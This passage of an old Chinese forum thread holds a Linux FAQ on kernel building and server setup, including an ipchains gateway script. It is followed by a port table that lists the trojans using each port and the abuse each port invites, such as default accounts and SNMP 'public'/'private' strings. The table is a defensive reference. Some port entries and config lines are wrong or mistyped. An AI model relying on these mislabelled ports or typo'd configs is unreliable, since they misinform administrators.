3） lilo根据输入选择不同的内核映象，如果你选择了linux就读取/boot下的核心映象；
4） 核心开始硬件检测和设备驱动程序的初始化，然后运行init
5） init进程根据/etc/inittab的配置运行一系列初始化脚本；
6） 完成后，启动getty进程接受用户的登录。

87.如何设置开机自动运行程序？
你可以在以下几个脚本文件中加入你想一启动系统就执行的命令：
/etc/rc.local、/etc/rc.sysinit以及/etc/rc.d/init.d。

88.为什么需要重新编译内核？
以下情况你需要重新编译内核，或加入动态内核模块：
1） 更新驱动程序；
2） 根据自己的需求定制最可靠的内核；
3） 升级Linux内核。

89.如何重新编译内核？
1） 进入Linux源代码目录：cd /usr/src/linux
2） 执行"make config"或"make menuconfig"、"make xconfig"配置内核选项，选中你想要的模块，去掉不想要的模块；
3） 执行"make zImage"命令，大概30到90分钟后，会生成一个zImage的新内核映像文件，存放在/usr/src/linux/arch/i386/boot目录下；
4） 然后将其拷贝到/boot目录下；
5） 修改lilo.conf文件，加入：
image=/boot/zImage
label=newlinux
root=/dev/hda1 （根据原来的文件）
运行/sbin/lilo使修改生效。
6）重新启动，在Lilo时，输入newlinux就可以新内核启动。

90.什么是动态内核模块？
动态内核模块是Linux一个成功的设计，它使得Linux更加灵活，易于定制。其实动态内核模块就是一个内核模块，它可以在不重新编译内核的情况，动态地将一些功能用"insmod 模块名"命令加入内核、用"rmmod 模块名"命令将其移出内核。


六、 廉价的网络解决方案---Linux：9问

91.如何使用Linux架设WEB服务器？
Apache服务器是在Linux架设WEB服务器的首选。你可以在安装Linux时就选择安装它。若在安装时没有安装Apache的话，你可以从光盘或者到apache网站上找到文件：apache-1.3.12.i386.rpm，然后执行以下命令完成安装：
1）rpm -ivh apache-1.3.12.i386.rpm
2）修改/etc/httpd/conf目录下的配置文件httpd.conf、access.conf等；
3）将主页文件放到/home/httpd/html目录下；
4）执行"/etc/rc.d/init.d/httpd start"启动Apache服务器
如果需要关闭的话，可以执行/etc/rc.d/init.d/httpd stop命令。

92.如何使用Linux架设FTP服务器？
在Linux中，最常用的FTP服务软件当数wu-ftpd，如果在安装linux时没安装上它。你可从光盘或者网站rpmfind.net/linux/RPM/WbyName.html获取它的RPM包：wu-ftpd-2.6.0-9.i386.rpm。然后执行以下命令完成安装：
rpm -ivh wu-ftpd-2.6.0-9.i386.rpm
编辑 "/etc/inetd.conf" 文件，指向新的ftpd守护进程，如下所示：
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
到此为止，你的Linux就可以接受FTP服务了。

93.如何使用Linux架设E-MAIL服务器？
Linux中，最常用的E-MAIL服务器是Sendmail，你可以在安装Linux时将其选中。
1） 在DNS服务器上为E-Mail服务器做一条MX记录；
2） 编辑/etc/inetd.conf文件，将关于pop和smtp的行的注释符去掉；
3） 执行kill -HUP inetd，使修改生效；
这样E-mail服务器的用户就可通过Outlook等客户端程序进行收发邮件了。

94.如何使用Linux架设News服务器？
在安装Linux时，选择INN软件包，并允许开机时启动innd。在完成系统的安装时，大部分配置工作已经完成，无需编译源码。
1）配置/etc/news/inn.conf：
domain: foo.com
organization: foo company news site
server: localhost
根据实际情况填写；
2）配置/etc/news/nnrp.access
nnrp.access是用来完成News Readers服务的守候进程nnrpd的配置文件，用于控制对站点的访问，修改此文件无须启动INND。
3）添加新闻组：
可以手工编辑/var/lib/news/active文件添加新闻组，也可以使用ctlinnd命令来增加。若是手工方式修改新闻组，须执行以下命令使其生效：
ctlinnd reload active "modify active"

95.如何使用Linux架设BBS？
1） 从ftp://pbbs.chpi.edu.tw/pub/pbbs/source下载PowerBBS的源代码发行包文件pbbs.tar.gz；
2） 执行tar zxvf pbbs.tar.gz解开文件；
3） 进入pbbs目录，运行Install；
4） 根据具体需求改变默认的设置。

96.如何让Linux成为文件服务器？
在Linux中，你可以用Samba来做文件服务器，你可以在安装Linux时选中Samba就可以完成安装。
1） 编辑/etc/smb.conf，修改配置：
　 netbios name=linux
workgroup=SambaServer
server string=Samba Server
hosts allow=192.168.9. 127.
　 securoty=share
interfaces=192.168.9.1/24
name resolve order=host dns bcast
wins support=no
2）重新启动SMB服务器：/etc/rc.d/init.d/smb restart
3）编辑客户机的hosts文件，加入对Samba Server的解析；
4）最后你就可以在网上邻居上看到它了。

97.如何使用Linux架设代理服务器？
1） 到http://squid.nlanr.net/Squid/下载Squid代理服务器软件squid-2.2.STABLE3-src.tar.gz；
2） 执行tar xzxf squid-2.2.STABLE3-src.tar.gz
3） 执行./configure
4） 执行make，make install安装到/usr/local/squid目录下；
5） 编辑/usr/local/squid/squid.conf文件，加入：
acl allowed_hosts src 192.168.9.0/255.255.255.0
注：假设你的内网IP地址是192.168.9.0；
6） 执行/usr/local/squid/bin/squid -z进行初始化
7） 执行/usr/local/squid/bin/squid开启服务
8） 在客户端设置代理服务器IP和端口3128，就可以访问Internet了。

98.如何使用Linux架设透明网关？
确认Linux内核已经支持ipchain，然后编写一个脚本ipchains.rule，内容为：
注：假设透明网关服务器的外网地址是：1.2.3.4，已经与Internet相连；内网地址是192.168.9.1，连在内网上。
#!/bin/sh
/sbin/ipchains -F forward
/sbin/ipchains -F input
/sbin/ipchains -F output
/sbin/ipchains -P forward DENY
/sbin/ipchains -P input ACCEPT
/sbin/ipchains -P output ACCEPT
external_interface=1.2.3.4
/sbin/ipchains -A input -j ACCEPT -i lo
/sbin/ipchains -A output -j ACCEPT -i lo
/sbin/ipchains -A input -j DENY -i eth1 -s 192.168.9.0/24
/sbin/ipchains -A input -j DENY -i eth1 -d 192.168.9.0/24
/sbin/ipchains -A output -j DENY -i eth1 -s 192.168.9.0/24
/sbin/ipchains -A output -j DENY -i eth1 -d 192.168.9.0/24
/sbin/ipchains -A input -j DENY -i eth1 -s $external_interface/32
/sbin/ipchains -A input -j DENY -i eth1 -s $external_interface/32
/sbin/ipchains -A output -j DENY -i eth1 -d $external_interface/32
/sbin/ipchains -A forward -j ACCEPT -i eth0 -s 192.168.9.0/24 -d 192.168.9.0/24
/sbin/modprobe ip_masq_ftp
/sbin/modprobe ip_masq_quake
/sbin/modprobe ip_masq_irc
/sbin/modprobe ip_masq_user
/sbin/modprobe ip_masq_raudio
/sbin/ipchains -A forward -j MASQ -i eth1 -s 192.168.9.0/24
运行这个脚本后，192.168.9.0网络中的所有机器只需将网关设置为192.168.9.1，就可以连到Internet上了。

99. Linux还能构建什么服务器？
Linux还可以成为域名服务器、PPP服务器、CVS服务器、路由器、防火墙，而且还可以通过LVS解决方式还构建服务器集群系统。

---

作者: kkkknn    时间: 2004-6-11 23:12
详细端口分配表
端口0
     服务Reserved
     说明通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。
     端口1
     服务tcpmux
     说明这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。
     端口7
     服务Echo
     说明能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。
     端口19
     服务Character Generator
     说明这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。
     端口21
     服务FTP
     说明FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。
     端口22
     服务Ssh
     说明PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。
     端口23
     服务Telnet
     说明远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术，入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。
     端口25
     服务SMTP
     说明SMTP服务器所开放的端口，用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭，他们需要连接到高带宽的E-MAIL服务器上，将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。
     端口31
     服务MSG Authentication
     说明木马Master Paradise、Hackers Paradise开放此端口。
     端口42
     服务WINS Replication
     说明WINS复制
     端口53
     服务Domain Name Server（DNS）
     说明DNS服务器所开放的端口，入侵者可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其他的通信。因此防火墙常常过滤或记录此端口。
     端口67
     服务Bootstrap Protocol Server
     说明通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们，分配一个地址把自己作为局部路由器而发起大量中间人（man-in-middle）攻击。客户端向68端口广播请求配置，服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。
     端口69
     服务Trival File Transfer
     说明许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。
     端口79
     服务Finger Server
     说明入侵者用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其他机器Finger扫描。
     端口80
     服务HTTP
     说明用于网页浏览。木马Executor开放此端口。
     端口99
     服务Metagram Relay
     说明后门程序ncx99开放此端口。
     端口102
     服务Message transfer agent(MTA)-X.400 over TCP/IP
     说明消息传输代理。
     端口109
     服务Post Office Protocol -Version3
     说明POP3服务器开放此端口，用于接收邮件，客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个，这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。
     端口110
     服务SUN公司的RPC服务所有端口
     说明常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等
     端口113
     服务Authentication Service
     说明这是一个许多计算机上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器，尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，将会看到许多这个端口的连接请求。记住，如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。
     端口119
     服务Network News Transfer Protocol
     说明NEWS新闻组传输协议，承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制，只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送SPAM。
     端口135
     服务Location Service
     说明Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时，它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗？什么版本？还有些DOS攻击直接针对这个端口。
     端口137、138、139
     服务NETBIOS Name Service
     说明其中137、138是UDP端口，当通过网上邻居传输文件时用这个端口。而139
     端口通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。
     端口143
     服务Interim Mail Access Protocol v2
     说明和POP3的安全问题一样，许多IMAP服务器存在有缓冲区溢出漏洞。记住：一种LINUX蠕虫（admv0rm）会通过这个端口繁殖，因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后，这些漏洞变的很流行。这一端口还被用于IMAP2，但并不流行。
     端口161
     服务SNMP
     说明SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中，通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。
     端口177
     服务X Display Manager Control Protocol
     说明许多入侵者通过它访问X-windows操作台，它同时需要打开6000端口。
     端口389
     服务LDAP、ILS
     说明轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。
     端口443
     服务Https
     说明网页浏览端口，能提供加密和通过安全端口传输的另一种HTTP。
     端口456
     服务[NULL]
     说明木马HACKERS PARADISE开放此端口。
     端口513
     服务Login,remote login
     说明是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。
     端口544
     服务[NULL]
     说明kerberos kshell
     端口548
     服务Macintosh,File Services(AFP/IP)
     说明Macintosh,文件服务。
     端口553
     服务CORBA IIOP （UDP）
     说明使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。
     端口555
     服务DSF
     说明木马PhAse1.0、Stealth Spy、IniKiller开放此端口。
     端口568
     服务Membership DPA
     说明成员资格 DPA。
     端口569
     服务Membership MSN
     说明成员资格 MSN。
     端口635
     服务mountd
     说明Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的，但是基于TCP的mountd有所增加（mountd同时运行于两个端口）。记住mountd可运行于任何端口（到底是哪个端口，需要在端口111做portmap查询），只是Linux默认端口是635，就像NFS通常运行于2049端口。
     端口636
     服务LDAP
     说明SSL（Secure Sockets layer）
     端口666
     服务Doom Id Software
     说明木马Attack FTP、Satanz Backdoor开放此端口
     端口993
     服务IMAP
     说明SSL（Secure Sockets layer）
     端口1001、1011
     服务[NULL]
     说明木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。
     端口1024
     服务Reserved
     说明它是动态端口的开始，许多程序并不在乎用哪个端口连接网络，它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器，打开Telnet，再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。
     端口1025、1033
     服务1025：network blackjack 1033：[NULL]
     说明木马netspy开放这2个端口。
     端口1080
     服务SOCKS
     说明这一协议以通道方式穿过防火墙，允许防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置，它会允许位于防火墙外部的攻击穿过防火墙。WinGate常会发生这种错误，在加入IRC聊天室时常会看到这种情况。
     端口1170
     服务[NULL]
     说明木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。
     端口1234、1243、6711、6776
     服务[NULL]
     说明木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。
     端口1245
     服务[NULL]
     说明木马Vodoo开放此端口。
     端口1433
     服务SQL
     说明Microsoft的SQL服务开放的端口。
     端口1492
     服务stone-design-1
     说明木马FTP99CMP开放此端口。
     端口1500
     服务RPC client fixed port session queries
     说明RPC客户固定端口会话查询
     端口1503
     服务NetMeeting T.120
     说明NetMeeting T.120
     端口1524
     服务ingress
     说明许多攻击脚本将安装一个后门SHELL于这个端口，尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图，很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口，看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。
     端口1600
     服务issd
     说明木马Shivka-Burka开放此端口。
     端口1720
     服务NetMeeting
     说明NetMeeting H.233 call Setup。
     端口1731
     服务NetMeeting Audio Call Control
     说明NetMeeting音频调用控制。
     端口1807
     服务[NULL]
     说明木马SpySender开放此端口。
     端口1981
     服务[NULL]
     说明木马ShockRave开放此端口。
     端口1999
     服务cisco identification port
     说明木马BackDoor开放此端口。
     端口2000
     服务[NULL]
     说明木马GirlFriend 1.3、Millenium 1.0开放此端口。
     端口2001
     服务[NULL]
     说明木马Millenium 1.0、Trojan Cow开放此端口。
     端口2023
     服务xinuexpansion 4
     说明木马Pass Ripper开放此端口。
     端口2049
     服务NFS
     说明NFS程序常运行于这个端口。通常需要访问Portmapper查询这个服务运行于哪个端口。
     端口2115
     服务[NULL]
     说明木马Bugs开放此端口。
     端口2140、3150
     服务[NULL]
     说明木马Deep Throat 1.0/3.0开放此端口。
     端口2500
     服务RPC client using a fixed port session replication
     说明应用固定端口会话复制的RPC客户
     端口2583
     服务[NULL]
     说明木马Wincrash 2.0开放此端口。
     端口2801
     服务[NULL]
     说明木马Phineas Phucker开放此端口。
     端口3024、4092
     服务[NULL]
     说明木马WinCrash开放此端口。
     端口3128
     服务squid
     说明这是squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。也会看到搜索其他代理服务器的端口8000、8001、8080、8888。扫描这个端口的另一个原因是用户正在进入聊天室。其他用户也会检验这个端口以确定用户的机器是否支持代理。
     端口3129
     服务[NULL]
     说明木马Master Paradise开放此端口。
     端口3150
     服务[NULL]
     说明木马The Invasor开放此端口。
     端口3210、4321
     服务[NULL]
     说明木马SchoolBus开放此端口
     端口3333
     服务dec-notes
     说明木马Prosiak开放此端口
     端口3389
     服务超级终端
     说明WINDOWS 2000终端开放此端口。
     端口3700
     服务[NULL]
     说明木马Portal of Doom开放此端口
     端口3996、4060
     服务[NULL]
     说明木马RemoteAnything开放此端口
     端口4000
     服务QQ客户端
     说明腾讯QQ客户端开放此端口。
     端口4092
     服务[NULL]
     说明木马WinCrash开放此端口。
     端口4590
     服务[NULL]
     说明木马ICQTrojan开放此端口。
     端口5000、5001、5321、50505
     服务[NULL]
     说明木马blazer5开放5000端口。木马Sockets de roie开放5000、5001、5321、50505端口。
     端口5400、5401、5402
     服务[NULL]
     说明木马Blade unner开放此端口。
     端口5550
     服务[NULL]
     说明木马xtcp开放此端口。
     端口5569
     服务[NULL]
     说明木马Robo-Hack开放此端口。
     端口5632
     服务pcAnywere
     说明有时会看到很多这个端口的扫描，这依赖于用户所在的位置。当用户打开pcAnywere时，它会自动扫描局域网C类网以寻找可能的代理（这里的代理是指agent而不是proxy）。入侵者也会寻找开放这种服务的计算机。，所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描包常含端口22的UDP数据包。
     端口5742
     服务[NULL]
     说明木马WinCrash1.03开放此端口。
     端口6267
     服务[NULL]
     说明木马广外女生开放此端口。
     端口6400
     服务[NULL]
     说明木马The tHing开放此端口。
     端口6670、6671
     服务[NULL]
     说明木马Deep Throat开放6670端口。而Deep Throat 3.0开放6671端口。
     端口6883
     服务[NULL]
     说明木马DeltaSource开放此端口。
     端口6969
     服务[NULL]
     说明木马Gatecrasher、Priority开放此端口。
     端口6970
     服务RealAudio
     说明RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP-7070端口外向控制连接设置的。
     端口7000
     服务[NULL]
     说明木马Remote Grab开放此端口。
     端口7300、7301、7306、7307、7308
     服务[NULL]
     说明木马NetMonitor开放此端口。另外NetSpy1.0也开放7306端口。
     端口7323
     服务[NULL]
     说明Sygate服务器端。
     端口7626
     服务[NULL]
     说明木马Giscier开放此端口。
     端口7789
     服务[NULL]
     说明木马ICKiller开放此端口。
     端口8000
     服务OICQ
     说明腾讯QQ服务器端开放此端口。
     端口8010
     服务Wingate
     说明Wingate代理开放此端口。
     端口8080
     服务代理端口
     说明WWW代理开放此端口。
     端口9400、9401、9402
     服务[NULL]
     说明木马Incommand 1.0开放此端口。
     端口9872、9873、9874、9875、10067、10167
     服务[NULL]
     说明木马Portal of Doom开放此端口
     端口9989
     服务[NULL]
     说明木马iNi-Killer开放此端口。
     端口11000
     服务[NULL]
     说明木马SennaSpy开放此端口。
     端口11223
     服务[NULL]
     说明木马Progenic trojan开放此端口。
     端口12076、61466
     服务[NULL]
     说明木马Telecommando开放此端口。
     端口12223
     服务[NULL]
     说明木马Hack99 KeyLogger开放此端口。
     端口12345、12346
     服务[NULL]
     说明木马NetBus1.60/1.70、GabanBus开放此端口。
     端口12361
     服务[NULL]
     说明木马Whack-a-mole开放此端口。
     端口13223
     服务PowWow
     说明PowWow是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有攻击性。它会驻扎在这个TCP端口等回应。造成类似心跳间隔的连接请求。如果一个拨号用户从另一个聊天者手中继承了IP地址就会发生好象有很多不同的人在测试这个端口的情况。这一协议使用OPNG作为其连接请求的前4个字节。
     端口16969
     服务[NULL]
     说明木马Priority开放此端口。
     端口17027
     服务Conducent
     说明这是一个外向连接。这是由于公司内部有人安装了带有Conducent"adbot"的共享软件。Conducent"adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。

---

作者: llljjjlljj    时间: 2004-6-11 23:15
睡觉了！每天继续！

---

作者: mhhbq    时间: 2004-8-4 00:59
提示: 作者被禁止或删除 内容自动屏蔽

---

作者: HHNOKIA    时间: 2005-1-22 19:22
经典~!!!!!!!!!!!!

---

作者: xiaoyanga    时间: 2005-1-22 19:46
看的有点累.但都是好东西.

---

作者: hmqs    时间: 2005-1-22 20:09
谢谢分享！！

---

作者: forestwing    时间: 2005-1-23 17:08
好帖,收藏了慢慢看

---

作者: haoyong586    时间: 2005-1-23 17:46
收藏收藏收藏收藏收藏收藏收藏收藏收藏
一定要收藏！

谢谢了，好东东！！

---

作者: tanyupeng    时间: 2005-1-23 18:59
呵呵，谢谢楼主，收藏！！！

---

作者: rcy0202    时间: 2006-4-27 20:11
呵，太长了，很难细心读下去

---

作者: chunruoshui    时间: 2006-4-27 20:13

原帖由 爱的惯性 于 2006-4-27 20:11 发表
呵，太长了，很难细心读下去

我也是这么说哦．．要是有图还好一点的．．

---

作者: hbyy108    时间: 2006-4-28 00:38
不错的帖子，收藏。抽空仔细学习！

---

作者: kangkang    时间: 2006-4-28 11:37
辛苦了，楼主。谢谢！

---

作者: yanliming    时间: 2006-4-28 11:42
真多，支持！！！！！！！！！！！

---

作者: FENGHUO    时间: 2006-4-28 11:57
感谢分享.

---

作者: opljklop    时间: 2006-6-1 23:51
看了好久，但是学到很多

---

作者: akaloo    时间: 2014-7-1 18:25
贴子很不错,收藏备用了!

---

作者: 镜子中我    时间: 2014-12-18 19:21
踩一个。。。。。。。。。

---

作者: 花児对莪笑    时间: 2014-12-23 09:12
平时保存的一些教程！

---

作者: 婲落    时间: 2014-12-25 16:17
留爪子搭在楼主身上~

---

作者: 上岗闲人    时间: 2015-1-12 10:35
加油！加油！我顶你个椅子！

---

作者: 镜子中我    时间: 2015-3-3 11:19
看看了！！！！

---

作者: 红颜倾城    时间: 2015-3-20 22:18
加油！加油！我顶你个椅子！

---

作者: 镜子中我    时间: 2015-3-30 19:12
谢谢，。。。。。。。。。。。。。。。

---

欢迎光临 热点科技 (https://itheat.com/activity/)

Powered by Discuz! X3.2